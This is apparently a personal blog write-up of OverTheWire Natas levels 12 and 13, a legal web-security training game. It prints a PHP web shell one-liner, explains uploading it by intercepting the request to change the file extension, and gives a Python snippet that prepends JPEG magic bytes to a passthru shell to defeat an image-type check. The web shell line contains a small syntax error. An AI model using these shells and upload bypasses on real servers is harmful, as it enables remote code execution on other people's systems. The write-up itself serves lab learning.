Natas 12 & 13 writeup

24 March 2019
by th3-3inst3in

Natas 12 & 13 writeup


<--Back

Natas 12

Visit this link to go to level 12 for which you’ll need the password from the previous level.

You’ll land on a page where you can upload a file. Our objective here is to upload a php file and get code execution.

The problem is that even if you upload a php file it gets renamed in to a jpg file so we need to intercept the request and change the file extension.

<?php system($_GET['cmd'];) ?>

select the file and intercept the request and change the extenion to php as shown in the picture

intercept

After the file is uploaded you’ll be given a link looking something like this

http://natas12.natas.labs.overthewire.org/upload/.php

You now have code execution on the server and can simply get the flag with the folloing command

intercept

Natas 13

Level 13 is quite similar to 12 with one minor change

Even if we use the trick we did in the last level we don’t get the php file to execute on the server reason is the folloing line of code

else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    }

The following python code can help bypass this check

>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()

The above code basically makes a file which contains the passthru() function to execute commands on the server but the first few bytes of the file will make it seem like its a valid image and hence will bypass the check . Upload the file and vola we have your shell.

13 flag

tags: web - overthewire
Contact me : Twitter , Facebook